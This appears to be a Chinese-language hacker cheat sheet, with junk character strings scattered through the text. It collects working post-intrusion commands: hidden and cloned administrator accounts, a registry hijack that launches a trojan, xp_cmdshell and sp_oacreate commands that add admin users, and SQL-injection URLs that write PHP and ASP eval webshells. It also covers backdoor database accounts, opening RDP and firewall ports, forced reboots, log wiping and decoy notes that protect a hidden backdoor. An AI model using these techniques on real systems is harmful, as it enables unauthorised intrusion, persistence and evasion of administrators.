, } u( A1 B" W
1.net user administrator /passwordreq:no
% _, P' d) G1 E, F) l1 z这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了# Z7 O5 G- Y+ [, [
2.比较巧妙的建克隆号的步骤
' e; K# \( G: J6 ]6 v$ }/ W先建一个user的用户% W$ p- ?* h! |9 P U. q
然后导出注册表。然后在计算机管理里删掉
c' ?4 a" m4 m在导入,在添加为管理员组
& k# Y' r- d8 R h+ W( [3.查radmin密码5 X+ n; U0 w" j9 H
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg0 k7 C1 B ], E& ?) d! I
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
, u& }# H) V/ ], h0 K建立一个"services.exe"的项9 u E' ~# y6 f
再在其下面建立(字符串值)
$ {# V& }' X% ~4 e/ N2 L键值为mu ma的全路径0 I8 f* r8 ^9 y/ i3 H3 ~
5.runas /user:guest cmd
3 |" ]9 `$ R& \' \7 c5 m2 b6 L测试用户权限!
1 F2 S }! a' ?" ~( L0 s0 X; j6.、 tlntadmn config sec = -ntlm exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'-- 其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?" P) x D* u+ N
7.入侵后漏洞修补、痕迹清理,后门置放:
+ R3 K( M) O: G9 {- ^' X1 J* ~4 x& N基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
7 J* g' k1 w/ K9 O/ J0 z8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c- D9 H: z& }. F9 R1 z
4 K( M- X# h7 P1 \+ l
for example2 u5 e* G6 S5 W# C! m8 [7 T
( ]" i; f, ~; K( ?1 ideclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'! f& Y! @% {" ]* ]
3 N+ Y% N& [3 D% r
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'8 c8 f9 F. j$ V% G" R6 l
- J' B* W, V! g7 Y9:MSSQL SERVER 2005默认把xpcmdshell 给ON了( P" q; R5 t% A6 ?+ \( N" z
如果要启用的话就必须把他加到高级用户模式/ s6 }* A' U% W9 q- |( \
可以直接在注入点那里直接注入
0 b/ b1 ]) y+ T. j; P% Vid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--9 N/ V, }* o3 R9 o* N
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
. P2 Z, I3 r+ o+ v# a& k或者
! Z5 `' ?/ E% F: M* V0 Bsp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'+ p6 m# n; W f/ I* Q0 W: \
来恢复cmdshell。: }' X, s) q3 _. P% J7 L
2 W1 @" W2 K, c4 _* \ Q$ w& W分析器
' C/ r" ^/ d5 l% ^% o" K' GEXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
# D' k8 [, V+ C( Q/ b2 ~然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")/ g1 |: u0 {9 P' q% d1 S+ g
10.xp_cmdshell新的恢复办法6 B! W6 p: i# V5 f$ l
xp_cmdshell新的恢复办法
; B5 w2 u/ b& N' t! u扩展储存过程被删除以后可以有很简单的办法恢复:
9 e/ g5 P2 }, ?$ _ T7 c% R0 F删除
, p2 Y0 {) \8 ^ @3 A' \0 B1 V0 Tdrop procedure sp_addextendedproc0 Y; _. r+ Z {1 m6 h1 b
drop procedure sp_oacreate
- a0 N6 C3 U' i9 wexec sp_dropextendedproc 'xp_cmdshell'
! D3 e; i3 i1 e
; x- o" S$ d$ }8 y2 l& r, x恢复) T! K# R3 S* [8 g# M% A
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
; @. q3 w) ~1 a& H/ `dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
. |0 }- @% G, g4 @* J
8 p. m0 o+ E6 o* ]2 N9 l" B* |这样可以直接恢复,不用去管sp_addextendedproc是不是存在
n3 a. m' Y; `% u( R3 s- w6 ]2 H9 V3 ?8 }* e
-----------------------------
7 {) g, E" l* B! L- X- ^6 D
4 F# b" S! R* ~) @删除扩展存储过过程xp_cmdshell的语句:3 _9 U3 z5 K: Z( X: T
exec sp_dropextendedproc 'xp_cmdshell'/ m5 h8 x: `$ y* Y8 k% w
& |3 ?9 I( d, q恢复cmdshell的sql语句: W Y8 P) S, p$ P
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
& H+ l+ ]' N N8 ]6 S, F# ? H. V4 u4 e, h/ o3 Y- Q! G1 ?1 H
) |3 K; ]* w9 |0 ?9 f1 I3 f开启cmdshell的sql语句
- P/ i' k, O6 q9 N" ^( e' z
: \3 Z' T( |+ }$ y* g8 texec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'1 ^. g b; [" T' ?1 r/ g* M
8 o2 ~8 T- r- P. K判断存储扩展是否存在9 d: d5 }# ]# N9 ]0 l
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'. N* K, j* T5 y
返回结果为1就ok. r! d" x* l; t4 `; H/ L; i) L
2 M. `, A% d* a8 ~% V) t恢复xp_cmdshell. d2 G, |. [& K* F T
exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' s* }# [( t$ J2 m0 }1 s$ t2 E
返回结果为1就ok1 q' P P' H7 c2 Q3 I7 _4 b8 |
. h# T+ R7 q* o @否则上传xplog7.0.dll; Q% b; j, {0 x1 Y
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'
6 W: d: x+ Q6 D" R6 |
8 v* `; y: V: h' B堵上cmdshell的sql语句! U( a5 F# Y3 A- ^3 @# P! f
sp_dropextendedproc "xp_cmdshel1 t$ C7 `5 u2 y) `* l/ w
-------------------------
# P ?; P$ K6 s" h; M. i清除3389的登录记录用一条系统自带的命令:
+ m5 |- H5 Y7 C1 L9 G$ ?) V: zreg delete "hkcu\Software\Microsoft\Terminal Server Client" /f
( ^- r! L& r! O0 N' k8 B; W7 O! |+ S
$ U4 [2 ^( L B/ b. e然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件$ X$ e; l$ r; ]" e) ]. w' h
在 mysql里查看当前用户的权限2 z) [3 S2 i0 K6 u1 H5 ~
show grants for
- K" N/ n# x4 w$ G; T! l
. Z' s/ c1 L0 r8 } ~以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。
& @9 U: R# t2 \/ O- j% z# F+ F, a6 q% x# T4 S% n' U( J9 C
* W( M2 ]! z5 \, ^1 ?Create USER 'itpro'@'%' IDENTIFIED BY '123';: I% b ^+ ^) `& F9 R. s
" l- c- y0 f. U$ _
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION# O M5 d7 f- z' ~
6 h" e' J3 u, l0 mMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0. _; v9 q; x4 ~% v3 _
: h. v6 k3 j' h3 o. ^7 I( Y+ K0 `
MAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;( {+ B5 F$ f: N( d/ t
, N9 F: W( W; P& _搞完事记得删除脚印哟。 P9 r/ D& X m0 X) s9 H
3 C+ }' O/ y& [3 @; e& ^& l/ o
Drop USER 'itpro'@'%';
+ R8 }: T7 m$ u6 p9 K [5 m. W
& k0 W+ v2 g( L3 \, ODrop DATABASE IF EXISTS `itpro` ;
$ d1 E( M& [7 q( |
9 A& ^6 X' n$ f: _( y7 u当前用户获取system权限+ J7 H( x! K/ G* f7 q
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact o9 i: z3 j- w1 T8 @2 d$ y' s3 E( v
sc start SuperCMD
. D! }( H3 `, G( r; w' Z程序代码- q2 Z" H' K3 c
<SCRIPT LANGUAGE="VBScript">
4 L& G N: g0 Y; [0 f3 tset wsnetwork=CreateObject("WSCRIPT.NETWORK")* h! d* b5 b% _8 }% ~% J' _
os="WinNT://"&wsnetwork.ComputerName" e7 C7 R6 E' T ^
Set ob=GetObject(os)
K1 q& ]: i1 gSet oe=GetObject(os&"/Administrators,group")- n- Y8 F3 q) e% \
Set od=ob.Create("user","nosec")6 `! I6 X8 }$ i$ ]$ E* Z( R8 @
od.SetPassword "123456abc!@#"5 |/ V1 s" u1 r
od.SetInfo
( z' O" S1 P) ]& H5 \+ s& xSet of=GetObject(os&"/nosec",user)
- ]. ~; ]9 O2 w5 d- Q: `oe.add os&"/nosec"
# Q" V4 g" d( j) ^6 c7 D</Script>
2 f& y/ Z0 E/ X6 Z- Z) k<script language=javascript>window.close();</script>
4 T: C" o2 h+ V$ E ]+ F3 M# s
7 e- v1 p) Z; B f' @1 I3 O o: o, G r+ `( b* R+ x4 D
/ s* b( v# J0 |5 a- V3 G2 n6 L% @( ^% ^+ t+ J
突破验证码限制入后台拿shell. r; d( k8 Q! v; d5 u$ `
程序代码 r0 u9 A- I$ R' S, c$ @# j
REGEDIT4
* n: m9 z# f# T) r/ [[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] $ s% h1 ?, [- I* u
"BlockXBM"=dword:00000000) d' ~- ^5 Q" e c9 ?- L
. a& T% m% b) |0 t3 i
保存为code.reg,导入注册表,重器IE
- n: e3 ^8 p. h! A& {1 r& M4 n就可以了
* S1 m8 H0 b: {union写马- w) F4 A/ C! A5 `" V2 s9 D
程序代码& _. G5 i0 T% G) S M; I
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*0 Z& _3 e) s2 `
0 K4 c/ e( C! ?% H$ h4 j; z: I
应用在dedecms注射漏洞上,无后台写马9 p4 H0 c' Q; ]( b6 g. f g
dedecms后台,无文件管理器,没有outfile权限的时候
1 v$ Y3 S" X0 d2 {: x9 w% B/ W在插件管理-病毒扫描里
- J# ^5 q$ I: n0 u* u7 e' M& X! c写一句话进include/config_hand.php里4 s1 b. \1 Q* P5 k
程序代码
. e2 V% U0 P9 ^: j5 I7 d>';?><?php @eval($_POST[cmd]);?>+ m( C$ Q M0 z$ s
( v3 _. n5 @; ^/ V ^+ P
* E+ p2 n) N$ z3 |5 O5 @" d$ T
如上格式
9 n8 J& p6 ~3 d
% {5 y6 Q) e, |8 [oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解$ @" s0 d, y. B
程序代码
( X6 q8 }& c* W2 d9 V; f2 Oselect username,password from dba_users;
; T" D# O5 t3 h4 i+ p7 I; g' V/ K, q4 p
% I s3 M# _0 y/ }/ ~
mysql远程连接用户
+ C$ T: y) L: D/ N2 @( R程序代码3 H1 F$ X5 ~2 D, J. Q8 u1 D/ ?% T0 y. s9 ]
: {; K6 Q% o; ?# y: DCreate USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
; v! ]) E6 ?- J4 tGRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
5 k0 d% a- j# W$ fMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
1 K. O- O3 X: ^9 z0 Y! dMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
3 W9 @; \& ?4 {6 H, S& N! Q6 n* ]# U+ x7 i7 `+ C% |
" Z/ @ ]( a' c1 T9 q4 d% J" q' g
% G8 P/ I1 I# N" B, Q6 b+ O- B' y6 u* p u
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
5 O: ~' W: O" ]( G I0 c6 S- i$ Q- h# T* ]: b- {) l5 N" V
1.查询终端端口
, t; Y! x' @2 `
" {' E7 u3 U' dxp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
0 S; b# G0 T8 g' H
# ]0 O0 j0 O1 T; A0 ]: h* Z通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"2 Z: n, i1 [0 f7 x$ U7 ~
type tsp.reg
: l! z+ g4 T4 v( f+ I# m1 w
1 c$ t/ c5 d- Z. ~+ S$ B; ~2.开启XP&2003终端服务$ }8 B1 b' s/ \* l6 p% S
! }: j' _: G; y; N* f
8 x7 y' @" S! g) ~2 u- B( k2 ZREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
. N7 V+ G3 k. @4 q$ L, ^) W4 c
1 }3 P' \( ?! u$ ]
# [4 g/ T8 G3 @/ pREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f* X/ ^- f, E( ~5 `! h t$ p
3 x: a3 h# J0 s" A1 G$ ~3 i3.更改终端端口为20008(0x4E28)9 r Z, k- H ?% t, [. }$ w
( G' `7 \# Q$ E1 Z% f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f$ i+ K% z4 v- s) M
% j: q, u- T" LREG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
* @- X% r% K. r, s ~7 F4 `& D
1 U4 c) K& {* A3 b! D4 `4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
5 m) v- t$ K$ C( T& f3 L- {( _/ V a: v& _# S- x0 l$ g% T4 b E
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f! C8 R) s- d# O6 n
& a% o* E0 k k. G. B, l7 ^: p7 D
2 \; Q3 n$ [6 {5.开启Win2000的终端,端口为3389(需重启)- X8 P! B. h& G+ o6 b- i
0 z% t, p% o+ s1 |
echo Windows Registry Editor Version 5.00 >2000.reg
! R G$ x2 r" J& Iecho. >>2000.reg
/ U" t8 N' M( {' zecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
& K3 w0 x* q% o' j F$ a4 j* Cecho "Enabled"="0" >>2000.reg
& [7 e9 J4 P" r: C* Recho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
$ H* J/ D0 o7 W9 @; o Lecho "ShutdownWithoutLogon"="0" >>2000.reg ) j' Z/ l5 V. o: K! T* f
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
2 e( a& s, Q; b* Q& h8 q9 d1 Cecho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
+ T. R: D6 P7 a# m, Y* `+ Secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
3 P0 G2 D: C) c7 U7 Gecho "TSEnabled"=dword:00000001 >>2000.reg
- Q" n6 H+ [" M7 B6 [ oecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg Y) {! E* S+ U5 V" A% v
echo "Start"=dword:00000002 >>2000.reg `3 s# g# p( l5 u1 I3 T
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg " P5 e- v0 v" O" W. S6 p$ t
echo "Start"=dword:00000002 >>2000.reg + _5 ~# G l) h/ ?
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
$ J$ Y6 O [7 s- P9 ^( d0 [5 @echo "Hotkey"="1" >>2000.reg ; x0 L! H W( F! O
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
! X" C7 T% \ ^ Y/ w3 ?8 `echo "ortNumber"=dword:00000D3D >>2000.reg . A- F9 T" u" f
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
7 |0 f# E, I5 W3 @; ?5 d& kecho "ortNumber"=dword:00000D3D >>2000.reg7 g1 H+ L K- G) Q- \7 S
- }. [, |2 N4 v3 Z, K6 n8 k8 H6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
$ Q# F: ~9 Q9 M; a. x" j
6 s, q6 E3 I! {@ECHO OFF & cd/d %temp% & echo [version] > restart.inf+ }: }) C2 u" B; I+ Q1 p9 T, I, T
(set inf=InstallHinfSection DefaultInstall)5 W3 s' G7 R3 x
echo signature=$chicago$ >> restart.inf
0 T( [7 L$ V2 P4 Kecho [defaultinstall] >> restart.inf
% }! U7 C; x8 ?9 zrundll32 setupapi,%inf% 1 %temp%\restart.inf$ N R# Q3 @6 Y" a0 D
7 W. Y5 C1 s$ s% U
9 Q' x! t0 f; D5 X T' v; C7.禁用TCP/IP端口筛选 (需重启)
6 P3 ~$ G- S# @4 F% G2 p1 A j. }& m$ W' T ~3 [3 w% i* S
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
2 ~6 v- l9 E) v) p
9 n4 \( @- m1 z8.终端超出最大连接数时可用下面的命令来连接5 E( i7 |7 x. u+ a
* j$ r! Y- ?3 k) y' K; f9 s' i' Amstsc /v:ip:3389 /console% |9 M9 p4 g$ R5 E* e
; S9 A2 A+ P4 @0 P
9.调整NTFS分区权限
9 e) S, S2 ] ]; S# B: k# S
0 ]' ?- R- f- tcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
: S8 C6 m6 `( R3 v% B t# U1 ~3 k
, C, {6 m( w5 L4 I( Gcacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件) j# }2 j5 O4 F
/ D/ ?9 S4 Z" z7 D
------------------------------------------------------6 f. t; Z& g) i c2 K
3389.vbs
1 {! J* l5 l& T+ IOn Error Resume Next' z4 F6 n: w- f0 Y- |3 {1 J
const HKEY_LOCAL_MACHINE = &H80000002
1 [8 e& J+ K) p! BstrComputer = "."# e1 d' b5 |" |' ~" \+ ^, N
Set StdOut = WScript.StdOut
. t E# a3 V% b+ zSet oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
. M9 S N6 z+ v" Z0 o$ i: LstrComputer & "\root\default:StdRegProv")
8 u: Q8 S% X# tstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"- g3 \! D& J3 ~- Q" \0 J5 W
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath5 W+ w$ B1 N$ w& | E( r8 s! }! n
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
. E$ X4 L/ H- X3 r7 K& doreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath7 B+ n8 K+ A5 S2 O
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"8 J2 n3 i8 L, e" J; R
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
+ a# _3 F3 z4 m1 x: O2 M* V9 l/ xstrValueName = "fDenyTSConnections"8 m: Y2 k# r, H) W2 R& N
dwValue = 0
$ s0 \; B1 Y# I1 S5 V. }oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
/ e) k; w5 |3 C+ S5 a2 F- b' y+ _6 estrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"+ f( l( j" o. I# ]1 f- S( _
strValueName = "ortNumber"" Q, E, F, `% r p
dwValue = 3389
9 u/ q7 T: Q3 M8 Z: Voreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue b* }- L: g8 s2 [$ b, j
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
$ b) t6 ^) S, H3 C/ e+ `; sstrValueName = "ortNumber"% C s. Y( a! J' P4 v `" ?
dwValue = 3389
& p; G8 p; E& o. \/ X* \8 D3 Eoreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
4 w. ]. ~0 k" z: cSet R = CreateObject("WScript.Shell") 1 E8 F( h* ]! f7 t2 z
R.run("Shutdown.exe -f -r -t 0")
5 ~6 c" c9 C( p7 X* {$ ]' U
8 c5 ?! X; F% G; j/ g! d删除awgina.dll的注册表键值: ^* l% D1 T8 ^; ?" o d# w) B) k
程序代码; U2 b+ l5 A5 |0 T% {$ p
" Y3 \, ?( N9 c9 j6 ?' D
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
7 w3 E7 D2 {9 k5 M# b/ q Y/ ?; @& x0 _; ^
% g6 c1 J) L9 ^. F2 |8 T6 i) {8 u
* ]4 L5 T, X: a ^
1 ~6 G6 F+ s! d程序代码
/ x3 u* [( w* y$ \3 |/ k/ {HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
( t- x; y9 s1 n0 x# ?
4 s; r5 J$ R& C- y; ?/ v- _2 U- ~设置为1,关闭LM Hash
) X/ t2 R3 ]' |' H; |( E- q4 a, T( @. S5 \5 Y
数据库安全:入侵Oracle数据库常用操作命令
4 t2 T) X7 K% u0 \# x/ L最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。
1 Z: ^6 ]. q( R* k6 {, c1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。$ p4 d, {& J: \
2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i; F9 ~" O7 L/ W# B5 m
3、SQL>connect / as sysdba ;(as sysoper)或# s0 N1 P4 \0 Q
connect internal/oracle AS SYSDBA ;(scott/tiger)8 x* _( s H* ^0 D* R2 y
conn sys/change_on_install as sysdba;
* c+ s5 {' h8 K) k7 A4、SQL>startup; 启动数据库实例- @2 _6 b7 ^+ o" H( C9 D8 i
5、查看当前的所有数据库: select * from v$database;
: t' S; ]1 m1 O* n0 r% A1 C9 lselect name from v$database;! i0 ]( k7 U7 \
6、desc v$databases; 查看数据库结构字段
: n1 X5 i" H( J2 h/ |) a7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:
( T2 L# X6 E1 h; T7 \. BSQL>select * from V_$PWFILE_USERS;% e6 n( n& r9 W
Show user;查看当前数据库连接用户" t& U$ n: p4 N! W
8、进入test数据库:database test;
9 X$ ^, ?0 a$ e8 q+ Y9、查看所有的数据库实例:select * from v$instance;0 }% K, d* a( C. ]2 F9 x* i& j
如:ora9i
0 f6 V. L' a- k1 n, v2 z! c10、查看当前库的所有数据表:/ [9 I: ?3 ^2 [
SQL> select TABLE_NAME from all_tables;
8 U$ H0 u5 W# k/ s0 Dselect * from all_tables;
3 L1 d0 G4 Y# e* B. k7 d. wSQL> select table_name from all_tables where table_name like '%u%';
# \5 [* b5 x9 mTABLE_NAME$ d' y l4 ]8 m _' _6 L
------------------------------! G- { ^7 _6 ^1 O$ W2 K; a7 p
_default_auditing_options_: k2 f- `0 [) J
11、查看表结构:desc all_tables;
" v$ d8 h2 a0 b' h, f* a/ K/ s' ?12、显示CQI.T_BBS_XUSER的所有字段结构:$ M# @, Z- C) l% Y3 h% P& m
desc CQI.T_BBS_XUSER;
% J3 {5 C& S; A: _13、获得CQI.T_BBS_XUSER表中的记录:* U6 r, m! s& t6 s+ D) ~6 G; N" B
select * from CQI.T_BBS_XUSER;8 v6 a3 v0 w( H
14、增加数据库用户:(test11/test)
! f$ o, ~/ r2 c4 j' T" vcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
& b5 ^9 v/ C5 O( | E6 z15、用户授权:5 ]' o# A: [ c: J4 S( R
grant connect,resource,dba to test11; T4 E' i Z& S+ Q8 t
grant sysdba to test11;" n# I- g/ K% ^4 f* z* J
commit;
. u# I3 _, m% U16、更改数据库用户的密码:(将sys与system的密码改为test.)5 A# H2 J3 x! y% S4 f
alter user sys indentified by test;1 ]6 R9 c, }4 C; z& _) Q
alter user system indentified by test;
- K" _: K7 X0 {, O% }. Q8 c5 f* M& d3 c2 \- t/ ~) |5 f
applicationContext-util.xml- t( g \# F; p3 Q* d+ ?* A8 N
applicationContext.xml
m: x0 M2 j+ L* B! Z) F [struts-config.xml- b* D* j( ?. n: N, w7 {
web.xml, b4 t+ x* G3 r3 }
server.xml0 }% v' v% c& b6 ?2 h, O
tomcat-users.xml
4 M& D; `' o) G, i: Zhibernate.cfg.xml
. `0 P, g, s* H c# ~database_pool_config.xml" ?- P* f6 i$ f6 B
8 h) o! G, y6 p! k0 o" K
! f8 m8 S2 P* I2 j# p- Y\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置- Z. i f/ ~' f2 _
\WEB-INF\server.xml 类似http.conf+mysql.ini+php.ini+ E3 K) L+ }, L
\WEB-INF\struts-config.xml 文件目录结构
D+ T4 i* Q& s! ~, T) |
! [. M- f' Z6 i8 Q7 L1 b) t5 {spring.properties 里边包含hibernate.cfg.xml的名称6 a1 R" ^9 q [' Y5 u! U
: p- P+ x! l% E4 k) C
7 o; V/ ~; _( `1 H6 {C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
2 k1 Y$ V! O& {9 l6 v
1 t' ^+ [4 D) k6 v5 B如果都找不到 那就看看class文件吧。。
- _, P0 o- P# y0 C! o5 N$ I+ f R( C; O2 x% Z: l1 `5 ?
测试1:5 W7 c) p0 [# N1 I
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1, r: H6 i# m& s( R+ D0 b, p( o7 H
4 Z3 S( `& c& V9 g1 J( r; f0 L
测试2:, C4 D& X! S L& i
5 r" E1 N! q* `. Jcreate table dirs(paths varchar(100),paths1 varchar(100), id int)
4 Y- Q; p [8 P8 P" u6 T; x6 _1 j; H2 ^0 b4 N- z
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
/ T( j. h, d1 H1 k6 I, X7 D, y9 A4 r O4 n6 X0 {
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1* A& m4 v7 u) P% k* p/ R
8 P/ [& M6 t3 w/ g3 y1 ]
查看虚拟机中的共享文件:! J7 g8 ^8 T5 G$ V
在虚拟机中的cmd中执行+ @+ E( O e0 V) O
\\.host\Shared Folders
, P8 o. ~' [6 d! M, U7 J/ `$ v$ O6 f" a& \- J' [
cmdshell下找终端的技巧* T8 w' p$ _2 z7 c& }
找终端:
2 V d1 V9 w1 h3 B$ @第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 6 `8 ?, L( P A# ]$ Y6 ~& F
而终端所对应的服务名为:TermService ! w7 g' k$ ?3 B" ~+ D: ^" a
第二步:用netstat -ano命令,列出所有端口对应的PID值!
$ E4 f3 m, g* F* | 找到PID值所对应的端口0 D( |2 V' w/ C# N& S3 o
7 F* B7 P- p6 r$ c/ O
查询sql server 2005中的密码hash/ z3 C8 ]$ a8 S+ G
SELECT password_hash FROM sys.sql_logins where name='sa'6 ^, ^5 |& A) n$ P4 V" U
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
& ]; e4 Z; n e; Z- Y# h; e( {access中导出shell
" I. Q& k$ K& e, L% z+ p! T/ h/ e; r+ @9 W
中文版本操作系统中针对mysql添加用户完整代码:
3 {; |! W4 @8 F1 d5 U$ [ e& G9 B; }: c- X6 ]
use test;0 U4 P. G) F1 D. x) l# c; r
create table a (cmd text);
